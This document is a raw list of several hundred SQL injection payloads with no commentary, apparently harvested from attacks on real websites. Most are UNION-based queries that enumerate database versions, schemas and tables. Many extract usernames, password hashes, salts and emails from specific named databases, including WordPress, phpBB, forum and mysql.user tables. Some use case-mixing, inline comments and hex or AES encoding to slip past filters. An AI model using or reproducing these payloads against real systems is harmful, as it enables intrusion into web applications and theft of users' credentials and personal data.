1,2,3,4,5,concat_ws(0x3a,user_login,user_pass),7,8,9,10,11 from u56665_belosn.wp_users-- -197 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat(user(),0x2f,version(),0x2f,database()),14,15,16,17,18,19,20,21,22,23/* -197' union select 1,2,3,4,5,user_password,7,username,9,10,11,12,13 from phpbb_users where user_id=1 limit 1/* -197 union select 1,2,3,user(),5,6/* -197 union select 1,2,concat_ws(0x2f,version(),user(),database()),4,5/* 197 union select 1,2,data,4,5,6 from msysaccessobjects where type=1 -197 union select 1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from easypeasy.hwz_users-- -197 union select 1,2,version(),concat(user(),0x3a,database()),5,6/* -197 union select 1,2,version(),database(),5,6/* -197 union select 1,2,version(),user(),5,6/* -197 union select 1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16 from INFORMATION_SCHEMA.TABLES limit 35,1/* -197 union select 1,unhex(hex(version())),3,4,5,6,7,8-- -197 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 -- -197 union select database()-- 1983_0' union select 1,AES_DECRYPT(AES_ENCRYPT(user(),0x17),0x17),3,4,5,6,7,8,9,10,11,12,13,14,15 from mysql.user/* -1983 union select 1,2,3,4,5,6,7,user()-- 1986 union select 1,2,3,concat(version(),0x3a,database(),0x3a,user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 limit 1,1 1987379872987 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),user(),database()),10,11,12,13,14,15-- -198 union select 1,2,3,4,5,6,7,8,version(),10,11,12,13,14 -- -198 union select 1,concat_ws(char(58,58),user(),database(),version()),3-- -1993_09' union select 1,AES_DECRYPT(AES_ENCRYPT(concat(user,0x3a,password),0x3a),0x3a),3,4,5,AES_DECRYPT(AES_ENCRYPT(user(),0x3a),0x3a),AES_DECRYPT(AES_ENCRYPT(version(),0x3a),0x3a),8,9,10,11,12,13,14,15 from mysql.user limit 1,1/* 1993 union select database(),2,VERSION(),user(),5,6,7,8,9,10/* -1994 union all select 1,group_concat(login,0x3a,password),3,4,5,6,7,8 from user-- 19956 unIOn sELect 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,concat(username,0x3a,password,0x3a,salt,0x3a,email,0x3a,usertitle),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5 from mobilnik_forum.forum_user where usertitle=0xc0e4ece8ede8f1f2f0e0f2eef0 limit 0,1/* -19984 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,AES_DECRYPT(AES_ENCRYPT(CONCAT((SELECT CONCAT(login,char(59),password) FROM b_user LIMIT 0,1)),0x71),0x71),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/* -19984 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,ID,LOGIN,PASSWORD),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 from b_user limit 0,1-- -19984 union select 1,2,3,4,5,6,7,8,9,10,11,version(),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/* 1-9999999.99999 UNION SELECT 1,CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),3,4,5,6,7,8,9-- 1-999999999.9 UNION SELECT 1,2,3,4,5,6,7,8,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),10-- -19999999999 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35-- 1999999999 union select 1,concat_ws(0x3a,table_schema,table_name),3,4,5,6,7,8,9 from information_schema.tables/* 1-999.9 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- 1-999.9 union select 1,2,3,4,5,group_concat(user_login,0x3a,user_pass) from wilmwow.wp_nbhjc0_users 19999 union select 1,2,3,concat(version(),0x3a,user(),0x3a,database()),5,6,7,8,9,10,11/* 1-999 union select 1,2,3,concat(version(),0x3a,database(),0x3a,user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18-- 1999 union select 1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16-- -1999 union select 1,2,unhex(hex(concat_ws(0x3a,admin_name,admin_pwd, admin_id))),4,5,6 from admin-- -199 union select 1,2,3,4,5,6,7,8,9,10,11,12,version(),14,15,16 from manager-- 199 union select 1,2,3,4,5,concat(nick,char(58),email,char(58),passwd,char(58),icq),7,8,9 from _user/* -199' union select 1,2,3,4,concat_ws(0x3a3a,version(),@@version_compile_os,user(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 -- 199 union select 1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11/* 199 union select 1,2,group_concat(concat_ws(0x3a,id,name_l,name_f,name_m,ybday,address,mobile,email,home,subscribe,active)),4,5 from plat_registration-- 199'union select 1,2,unhex(hex(concat_ws(version(),0x3a,user()))),4,5,6,7,8,9,10/* 19 and 0=1 union select 0,1,group_concat(vchusername,0x3a,vchpassword),3,4 from tblAdmin 19 and 1=0 union select 1,2,3,version(),5,6,7,8,9,10-- 19' and 1=0 union select 1,2,concat_ws(0x3a,login,pass),4,5,6 from users -- 19' and 1=0 union select 1,2,concat_ws(0x3a,username,passwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from user-- 19 aNd 1=0 UNION SELECT 1,2,version(),4,5 -- 19 aNd 1=0 UNION SELECT 1,version(),3,4,5,6,7 -- -19 and 1=2 union all select 1,2,3,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),user(),database()),0x71),0x71),5,6,7,8,9,10,11,12-- -19 and 1=2 union select 1,2,3,4,concat(@@version,0x20,user(),0x20,database(),0x20,@@version_compile_os) -- 19' and 1=2 union select 1,2,3,group_concat(table_name),5,6,7,8 from information_schema.tables -- 19 and substring((select version()),1,1)=5 19 or 1=(select top 1 table_name from information_schema.tables) -- 19 or 1=(SQL INJ))-- 19;select version()::int,2 from pg_user-- -19 UNION SELECT 1,2/* -19 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 -- -19 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 -- -19 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,version(),19 -19 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),14,15,16,17,18,19 -19 union select 1,2,3,4,5,6,7,8,9,10,concat(username,0x3a,password),12 from user -19 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user(),database(),version()),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- -19 union select 1,2,3,4,5,6,7,8,9,version()-- -19 union select 1,2,3,4,5,6,7,8,concat(username,0x3a,password),10,11 from phorum_users limit 10,1-- -19 union select 1,2,3,4,5,6,7,8,user(),database(),version(),12,3,14,5,6,7,8,9,20,1,22,3,4,5,26,7,8,9,0,1,2,33,34,5,6/* -19 union select 1,2,3,4,5,6,7,8,version(),10,11 19 union select 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- -19 union select 1,2,3,4,5,6,database(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36/* -19 union select 1,2,3,4,5,6 limit 1,1/* -19' union select 1,2,3,4,5,concat_ws(0x3a,user(),database(),version()),7,8,9,10,11,12,13,14,15,16/* -19 union select 1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9,10,11 -19 union select 1,2,3,4,5,group_concat(UserName,char(58),Password),7,8,9,10,11,12,13,14 from williamoravetz_umracing.Users-- -19 union select 1,2,3,4,5,version(),database(),8,9,10,11,12/* -19 union select 1,2,3,4,concat(version(),0x3a,user(),0x3a,database())-- -19 union select 1,2,3,4,concat_ws(0x3a3a,version(),user(),database()),6,7,8,9,10,11,12-- -19 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from information_schema.tables-- -19 union select 1,2,3,4,version(),6,7,8,9,10,11,12,user(),14/* -19 union select 1,2,3,concat(login,0x3a,pass),5,6,7,8,9,10,11 from Partner-- -19' union select 1,2,3,concat(user(),0x3a,database(),0x3a,version()),5,6,7,8/* -19 union select 1,2,3,concat(version(),0x3a,database(),0x3a,user())-- -19' union select 1,2,3,concat_ws(0x3a ,user(),database(),version()),5,6,7,8,9 from admin/* -19 union select 1,2,3,concat_ws(0x3a,username,password),user(),6,7,8 from vetlek_forums_users where group_id=1 -- -19 union select 1,2,3,concat_ws(0x3a,version(),user()),5-- -19' union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- -19 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7-- -19 union select 1,2,3 from "table" -19 union select 1,2,3,table_name,5,6,7,8,9,10 from information_schema.tables limit 76,1 -- -19' union select 1,2,3,version(),5,6,7,8,9/* -19 union select 1,2,AES_DECRYPT(AES_ENCRYPT(concat(name,0x3a,password),0x73),0x73),4,5,6 from users/* -19 union select 1,2,concat(mail,char(58),passwd),4,5,6,7 FROM eval_members/* 19 union select 1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 limit 1,1 -19 union select 1,2,concat(version(),0x3a,user(),0x3a,database()),4,5,6-- -19 union select 1,2,concat_ws(0x2f,version(),user(),database()),4/* -19 union select 1,2,concat_ws(0x3a3a,version(),user(),database()),4,5,6-- 19 union select 1,2,concat_ws(0x3a,database(),user(),version()),4,5,6,7,8,9,10,11,12,13,14,15 -19 union select 1,2,concat_ws(0x3a,user_login,0x3a,user_pass,0x3a,user_nicename,0x3a,user_email,0x3a,display_name),4,5,6,7,8 from as_users-- -19 union select 1,2,concat_ws( 0x3a,username,password),4,5,6,7,8 from user limit 0,1 -- -19 union select 1,2,concat_ws(0x3a,version(),0x3a,user(),@@version_compile_os),4,5-- -19 union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10/* 19 union select 1,2,concat_ws(0x3a,version(),database(),user()) limit 1,1/* -19 UNION SELECT 1,'2',tablename from pg_tables where tablename not in ('agency_banner_click','agency_mst','campaign','domain','domain2','errmsg_mst','errmsg_mst','errmsg_mst','mail_template','nyukin','option','pg_aggregate','pg_am','pg_amop','pg_amproc','pg_attrdef','pg_attribute','pg_cast','pg_class','pg_conversion')-- -19 union select 1,2,unhex(hex(concat_ws(0x3a,version(),database(),user()))),4,5,6,7,8,9,10,11,12,13,14,15-- -19 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- -19 union select 1,concat_ws(0x3a,user(),version(),database()),3-- -19 union selecT 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6 -19 union select 1,convert(version() using latin1),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/* -19 union select 1,login,passwd,4,5,6,7,8,9,10,11,12 from user/* -19 union select 1,password,username,4,5,6,7,8 from users limit 0,1/* -19 union select 1,user(),3,4,database(),6,version( )/* -19 union select 1,user(),3,4,database(),6,version()/* -19 union select 1,user(),version(),4,5/* -19 union select 1,version(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/* -19 union select 1,version(),3,4,user(),database(),7,8,9,10,11,12,13-- 19 union select concat(Version(),0x3a,Database(),0x3a,User()) LIMIT 1,1 -19 union select concat_ws(0x3a3a,UseRNamE,password) from mos_users -- -19 uNIon sELect cONcat_wS(0x3a3a,version(),user(),database())#content -19 union select concat_ws(0x3a,id,username,password),concat_ws(0x3a,user(),version(),database()) from users/* -19 union select concat_ws(char(58,58),user(),database(), version())-- -19 union select null,null,null,version(),current_user(),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null-- -19 UNION SELECT version(),2,3,4,5,6 19 version() LIMIT 1,1 -1 and 0=1 union select 1,2,3,4,5,6,7,8,9,10,concat_Ws(0x3a3a3a,version(),database(),user()),12,13,14,15,16,17,18,19-- -1 and 0=1 union select 1,2,3,4,5,6,7,concat_ws(0x3a3a3a,version(),database(),user()),9,10,11,12,13-- -1 and 0=1 union select 1,2,3,4,5,6,7,concat_ws(0x3a3a3a,version(),database(),user()),9,10,11,12,13,14,15-- -1 and 0=1 union select 1,2,3,4,5,6,concat_ws(0x3a3a3a,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19-- -1 and 0=1 union select 1,2,3,4,5,concat_ws(0x3a3a3a,version(),database(),user())-- -1 and 0=1 union select 1,2,concat_ws(0x3a3a3a,version(),database(),user()),4,5,6,7-- -1 and 0=1 union select 1,2,concat_ws(0x3a3a3a,version(),database(),user()),4,5,6,7,8,9,10,11,12-- -1 and 0=1 union select 1,concat_ws(0x3a3a3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15-- -1 and 0=1 union select concat_ws(0x3a3a3a,version(),database(),user()),2,3,4,5-- -1 and 0 union select 1,2,3,4,5,6,7,8,9,table_name,11,12,13,14,15,16,17,null,19,20,21,22,23,24,25,26,27,28,29,30,31 from information_schema.tables limit 26,1/* 1 and 0 union select 1,2,concat(username,0x3a,password),4,5,6,7 from #__users where gid=25 or gid=24 and block<>1-- 1 and 0 union select 1,2,version(),4,5-- 1' and 1=01 union select version(),2,user(),database(),5,6,7,8,9,10,11,12,13,14,15,16-- 1 and 1=0 union all select 1,version(),database(),4,5,6,user(),8/* 1 and 1=0 union select 1,2,3/* 1 and 1=0 Union Select 1,2,3,4,0x494E43,concat(@@version,0x3a,user(),0x3a,database(),0x3a,@@version_compile_os)-- 1 and 1=0 union select 1,2,3,4,5,6,7,8-- 1 and 1=0 Union Select 1,2,3,4,5,6,7,8,9,10,11,12,13,14-- 1 and 1=0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 -1 and 1=0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,concat_ws(0x3a3a3a,version(),database(),user()),25,26,27,28,29,30-- -1 and 1=0 union select 1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a3a3a,version(),database(),user()),12,13,14-- -1 and 1=0 union select 1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a3a3a,version(),database(),user()),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36-- -1 and 1=0 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a3a3a,version(),database(),user()),10,11,12,13,14,15,16,17,18,19,20,21-- 1 and 1=0 union select 1,2,3,4,5,6,concat_ws(0x2f,user(),version(),database())-- -1 and 1=0 union select 1,2,3,4,5,6,concat_ws(0x3a3a3a,version(),database(),user()),8,9,10,11,12,13-- -1 and 1=0 union select 1,2,3,4,5,6,concat_ws(0x3a3a3a,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47-- 1 and 1=0 union select 1,2,3,4,5,6,concat_ws(0x3a,login,pass),8 from user -- 1 aNd 1=0 UNION SELECT 1,2,3,4,5,6,version() -- -1 and 1=0 union select 1,2,3,4,5,concat_ws(0x3a3a3a,version(),database(),user())-- -1 and 1=0 union select 1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from information_schema.tables-- -1 and 1=0 union select 1,2,3,4,concat_ws(0x3a3a3a,version(),database(),user())-- -1 and 1=0 union select 1,2,3,4,concat_ws(0x3a3a3a,version(),database(),user()),6-- -1 and 1=0 union select 1,2,3,4,concat_ws(0x3a3a3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16-- -1 and 1=0 union select 1,2,3,4,concat_ws(0x3a3a3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- -1 and 1=0 union select 1,2,3,4,concat_ws(0x3a3a3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41-- 1 and 1=0 UnIon selECt 1,2,3,4,group_concat(schema_name),6,7,8,9 from information_schema.schemata -- 1' and 1=0 UNION SELECT 1,2,3,4,version(),6 -- 1 aNd 1=0 UNION SELECT 1,2,3,4,version(),6,7,8,9,10,11 -- -1' and 1=0 union select 1,2,3,concat_ws(0x3a3a3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14-- 1' and 1=0 union select 1,2,3,concat_ws(0x3a,ADMIN_LOGIN,ADMIN_PASSWORD),5,6,7,8,9,10,11,12 from admin -- 1 and 1=0 Union Select 1,2,3,concat_ws(0x3a,username,email,level),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from users-- 1 and 1=0 union select 1,2,3,concat_ws(0x3a,user(),version(),database()),5,6/* 1' and 1=0 union select 1,2,3,group_concat(table_name separator 0x3a),5,6,7,8,9 from information_schema.tables where table_schema=0x76696e746167645f617a697a/* 1 and 1=0 union select 1,2,3,unhex(hex(concat_ws(0x3a,user(),database(),version()))),5,6,7,8,9/* 1 aNd 1=0 /*!UNION*/ SELECT 1,2,3,version(),5,6 -- 1' aNd 1=0 UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12 -- -1 and 1=0 Union Select 1,2,CONCAT(0x3a,version()),4,5,6 -- -1' and 1=0 union select 1,2,concat_ws(0x3a3a3a,version(),database(),user()),4,5,6-- -1 and 1=0 union select 1,2,concat_ws(0x3a3a3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15-- -1 and 1=0 union select 1,2,concat_ws(0x3a3a3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- -1 and 1=0 union select 1,2,concat_ws(0x3a3a3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46-- 1 and 1=0 union select 1,2,concat_ws(0x3a,ID,USERNAME,PASSWORD),4,5,6 from user -- 1' and 1=0 UnIon selECt 1,2,concat_ws(0x3a,id,username,userpass,sal,firstname,lastname,paypalaccount,userim,usertel,interestgame,signup_url,signuptime,introducerid,usertype,usertotal),4,5,6,7,8,9,10,11,12,13,14,15,16 from virgoods_member limit 51,1-- 1 and 1=0 union Select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7 -- 1 and 1=0 union select 1,2,pass,4,5,pwdsalt,7,8,9,10 from runcms_users where uid=2 -1 and 1=0 union select 1,2,unhex(hex(concat_ws(0x3a3a3a,version(),database(),user()))),4,5,6-- -1 and 1=0 Union Select 1,2,user(),version() from admins-- -1' and 1=0 UNION SELECT 1,2,version(),4,5,6,7,8,9 -- 1 and 1=0 union select 1,2,version(),4,5,6,7,database()-- -1 and 1=0 union select 1,concat_ws(0x3a3a3a,version(),database(),user()),3,4-- -1 and 1=0 union select 1,concat_ws(0x3a3a3a,version(),database(),user()),3,4,5,6,7,8,9,10-- 1 and 1=0 union select 1,concat_ws(0x3a3a,version(),user(),database()),3,4,5 -- 1 and 1=0 union select 1,concat_ws(0x3a,user(),database(),version()),3,4 -- 1 and 1=0 union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6-- 1 and 1=0 union select 1,concat_WS(0x3a,user(),database(),version()),3,4,5,6,7,8,9-- 1 and 1=0 union select 1,concat_ws(0x3a,user(),version(),database())/* 1 and 1=0 union select 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7-- 1 and 1=0 Union Select 1,database(),3,4,5/* 1 and 1=0 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x636d735f70617373776f7264-- 1 and 1=0 union select 1,group_concat(schema_name),3,4 from information_schema.schemata -- -1' and 1=0 UNION SELECT 1,group_concat(schema_name SEPARATOR 0x0b),3 FROM information_schema.schemata -- 1 and 1=0 UnIon selECt 1,group_concat(table_name),3,4,5,6,7,8,9,10 from information_schema.tables where Table_schema=database() -- 1 and 1=0 union select 1,group_concat(table_name),3 from information_schema.tables-- 1 and 1=0 union select 1,group_concat(table_name SEPARATOR 0x3c62723e),3,4,5,6 from information_schema.tables Where table_schema=database() -- 1' and 1=0 union select 1,group_concat(version(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16 -- -1 and 1=0 union select 1,unhex(hex(version())),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36-- 1 and 1=0 union select 1,version() -- 1 and 1=0 union select concat(0x5b,0x4d,0x61,0x63,0x68,0x69,0x6e,0x65,0x3a,0x20,@@version_compile_machine,0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x4f,0x53,0x20,0x3a,0x20,@@version_compile_os,0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x44,0x42,0x20,0x56,0x65,0x72,0x73,0x69,0x6f,0x6e,0x3a,0x20,0x20,@@version,0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x56,0x65,0x72,0x73,0x69,0x6f,0x6e,0x20,0x43,0x6f,0x6d,0x6d,0x65,0x6e,0x74,0x3a,0x20,@@version_comment,0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x53,0x79,0x73,0x74,0x65,0x6d,0x20,0x55,0x73,0x65,0x72,0x3a,0x20,system_user(),0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x48,0x6f,0x73,0x74,0x6e,0x61,0x6d,0x65,0x3a,0x20,@@hostname,0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x44,0x61,0x74,0x61,0x44,0x69,0x72,0x3a,0x20,@@datadir,0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x42,0x61,0x73,0x65,0x64,0x69,0x72,0x3a,0x20,@@basedir,0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x74,0x6d,0x70,0x20,0x44,0x69,0x72,0x3a,0x20,@@tmpdir,0x20,0x5d,0x20,0x2d2d,0x2d,0x20,0x5b,0x20,0x44,0x61,0x74,0x61,0x62,0x61,0x73,0x65,0x3a,0x20,database(),0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x53,0x74,0x6f,0x72,0x61,0x67,0x65,0x20,0x45,0x6e,0x67,0x69,0x6e,0x65,0x3a,0x20,@@storage_engine,0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x53,0x51,0x4c,0x20,0x57,0x61,0x72,0x6e,0x69,0x6e,0x67,0x73,0x3a,0x20,@@sql_warnings,0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x53,0x65,0x72,0x76,0x65,0x72,0x20,0x49,0x44,0x3a,0x20,@@server_id,0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x4c,0x69,0x63,0x65,0x6e,0x73,0x65,0x3a,0x20,@@license,0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x53,0x65,0x63,0x75,0x72,0x65,0x20,0x41,0x75,0x74,0x68,0x3a,0x20,@@secure_auth,0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x45,0x78,0x70,0x69,0x72,0x65,0x20,0x4c,0x6f,0x67,0x73,0x20,0x44,0x61,0x79,0x73,0x3a,0x20,@@expire_logs_days,0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x4c,0x6f,0x67,0x20,0x57,0x61,0x72,0x6e,0x69,0x6e,0x67,0x73,0x3a,0x20,@@log_warnings,0x20,0x5d,0x20,0x20,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x53,0x79,0x73,0x74,0x65,0x6d,0x20,0x54,0x69,0x6d,0x65,0x20,0x5a,0x6f,0x6e,0x65,0x3a,0x20,@@system_time_zone,0x5d,0x20,0x2d,0x2d,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x54,0x69,0x6d,0x65,0x20,0x5a,0x6f,0x6e,0x65,0x3a,0x20,@@time_zone,0x20,0x5d)-- -1 and 1=0 Union Select concat(@@version,0x3a,user(),0x3a,database(),0x3a,@@version_compile_os),null-- -1 and 1=0 union select concat_ws(0x3a3a3a,version(),database(),user())-- 1 and 1=0 union select concat_ws(0x3a,database(),user(),version()),2-- 1 and 1=0 union select concat_ws(0x3a,logauth,pasauth),2,3 from auth 1 and 1=0 union select concat_ws(0x3a,user,pass),2,3 from users 1 and 1=0 Union Select group_concat(password,0x3a,username,0x3a,email) from adb_user-- 1 and 1=0 union select group_concat(table_name) from information_schema.tables where table_schema=database() -- 1 and 1=0 Union Select null,null,concat(0x494E43,@@version,0x3a,user(),0x3a,database(),0x3a,@@version_compile_os),null,null,null-- 1 and 1=0 Union Select UNHEX(HEX(version())) -1 and 1=0 UNION SELECT version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 -- 1 and 1=1 union all select 1,2,3,version(),database(),user(),7,8,9,10,11,12 1/**/anD/**/1=-1/**/uniON/**/aLl/**/seLeCT/**/1,version(),3,4,5,6,user(),8,9,null -- 1 anD 1=-1 union select 1,0,version() 1 and 1=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/* 1 and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 from cat/* -1' and 1=1 union select 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),8,9 -- 1 and 1=-1 union select 1,2,3,4,5,user(),7,8/* 1 and 1=-1 union select 1,2,3,null,concat(user,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from mysql.user/* -1 and 1=1 union select 1,2,concat_ws(0x3a,user(),database(),version(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14,15 -- 1 and 1=-1 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32-- -1' and 1=1 union select 1,2,version(),4,5,6,7,8,user(),10,11,12,13,14,15,16,17,18-- 1 anD 1=-1 uniON seLEcT 1,user(),3,4,5,6,7 from users/* -1 and 1=1 UNION SELECT concat_ws(0x3a,version(),user(),database()) -1 and 1=1 UnIoN SeLeCT concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8,9 from mysql.user-- -1 and 1=1 union select version()-- 1 and 1=2 union all select 1 1' and 1=2 union all select 1,2,3,4,5,6,7,8,9,concat_ws(0x3a ,user(),database(),version()),11 from users/* -1 and 1=2 union all select 1,2,3,4,5,aes_decrypt(aes_encrypt(concat_ws(char(58),@@version,user(),database()),0x71),0x71),7,8,9,10,11,12,13,14,15,16,17,18,19 -- -1 and 1=2 union all select 1,aes_decrypt(aes_encrypt(concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),0x71),0x71),3,4,5,6-- -1 and 1=2 union all select concat_ws(0x3a,login,password,email),2,3,4,5,6,7,8,9,10 from users-- -1 AND 1=2 UNION SELECT 0,1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15,16,17,18,19,20-- 1 and 1=2 union select 1,2,3,4,5,6,7,8,9/* 1 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,table_NAME,13,14444 from INFORMATION_SCHEMA.tables-- 1 AND 1=2 UNION SELECT 1,2,3,4,5,6,7,8, version(),10,11,12,13,14,15,16,17-- -1 and 1=2 union select 1,2,3,4,5,6,7,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),9,10,11,12,13,14,15,16,17,18,19,20,21,22 -- -1 AND 1=2 UNION SELECT 1,2,3,4,5,6 from user-- 1 and 1=2 union select 1,2,3,4,5,6,user(),0x61,9,10,11,12,13,14,version(),database(),17,18,19 -- 1 and 1=2 union select 1,2,3,4,5,6,version(),user(),9,10 -- -1 and 1=2 union select 1,2,3,4,5,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),7,8,9,10 -- 1 and 1=2 union select 1,2,3,concat(version(),0x3a,user(),0x3a,database()),5,6,7,8,9,10,11,12,13,14,15 -- 1 and 1=2 union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6-- 1 and 1=2 union select 1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 